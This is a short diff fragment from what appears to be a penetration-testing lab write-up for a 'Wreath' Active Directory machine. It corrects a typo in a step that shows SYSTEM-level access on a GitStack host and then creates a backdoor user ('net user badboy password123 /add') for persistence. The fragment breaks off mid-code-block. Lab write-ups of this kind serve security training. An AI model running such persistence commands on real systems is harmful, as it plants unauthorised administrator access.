thesinghsec/HackingNotes101/Machines/AD/Wreath.md

 PS C:\GitStack\gitphp> whoami
 nt authority\system
 ```
-- For persistence, I add a new user, with memeber of administrators and remote management users group.
+- For persistence, I add a new user, with members of administrators and remote management users group.
 ```powershell
  net user badboy password123 /add